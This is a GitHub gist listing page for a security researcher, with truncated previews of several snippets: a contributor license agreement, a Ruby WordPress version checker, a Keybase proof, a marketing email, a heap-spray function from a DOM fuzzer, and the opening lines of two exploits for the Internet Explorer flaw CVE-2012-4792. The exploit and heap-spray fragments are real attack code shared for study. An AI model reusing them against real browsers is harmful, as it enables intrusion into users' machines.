Skip to content

Instantly share code, notes, and snippets.

@dguido
dguido / tob_icla.txt
Last active Jun 20, 2018
Trail of Bits Individual Contributor License Agreement
View tob_icla.txt
Trail of Bits Individual Contributor License Agreement
Thank you for your interest in software from Trail of Bits ("TOB"). In order to
clarify the intellectual property license granted with Contributions from any person
or entity, the TOB must have a Contributor License Agreement ("Agreement") on file
that has been signed by each Contributor, indicating agreement to the license terms
below. This license is for your protection as a Contributor as well as the
protection of TOB and its users; it does not change your rights to use your own
Contributions for any other purpose.
@dguido
dguido / wp_version.rb
Created Apr 23, 2015
My first Ruby script
View wp_version.rb
#!/usr/bin/ruby
require 'rubygems'
require 'nokogiri'
require 'open-uri'
require 'uri'
# Chrome on Win7
USERAGENT= "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0"
View keybase.md

Keybase proof

I hereby claim:

  • I am dguido on github.
  • I am dguido (https://keybase.io/dguido) on keybase.
  • I have a public key whose fingerprint is 9339 F792 8B51 C11D E67D 7247 EA8F 0B5C D09A 6DEC

To claim this, I am signing this object:

@dguido
dguido / shady_verizon.txt
Created Jun 23, 2013
Unsolicited e-mail, Subject: "Additional Resource for isis.poly.edu"
View shady_verizon.txt
Hello Dan,
My name is Parker and I'm helping Verizon Enterprise Solutions announce
the 2013 Data Breach Investigations Report. Have you heard about it or
perhaps already read it?
The report features many new insights and contributors like US-CERT and
the Secret Service. I thought it would be of interest to the NYU Poly
students and faculty much like the articles I found on your "Resources"
page at http://www.isis.poly.edu/resources
@dguido
dguido / ref_fuzz5.js
Created Mar 7, 2013
Heap spray code snippet from lcamtuf's ref_fuzz5 JavaScript DOM fuzzer
View ref_fuzz5.js
function heap_spray() {
if (MEGS == 0 || R(2) == 0) return;
if (!spray_str) {
var spray_str = "ABCDABCD";
for (var i=0;i<21;i++) spray_str += spray_str; /* 16M */
}
window.name = Math.random() + spray_str + Math.random();
@dguido
dguido / CVE-2012-4792-peter.js
Created Mar 7, 2013
Exploit for CVE-2012-4792 as improved by Peter Vreugdenhil
View CVE-2012-4792-peter.js
e_form = document.getElementById("formelm");
e_div = document.getElementById("divelm");
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
animvalues += animvalues
}
for(i = 0; i < 21; i++) {
animvalues += ";cyan";
}
for(i =0; i < 20; i++) {
@dguido
dguido / CVE-2012-4792-elderwood.js
Last active Dec 14, 2015
Exploit for CVE-2012-4792 as developed by Elderwood
View CVE-2012-4792-elderwood.js
var e0 = null;
var e1 = null;
var e2 = null;
var arrObject = new Array(3000);
var elmObject = new Array(500);
for (var i = 0; i < arrObject.length; i++) {
arrObject[i] = document.createElement('div');
arrObject[i].className = unescape("ababababababababababababababababababababa");
}
You can’t perform that action at this time.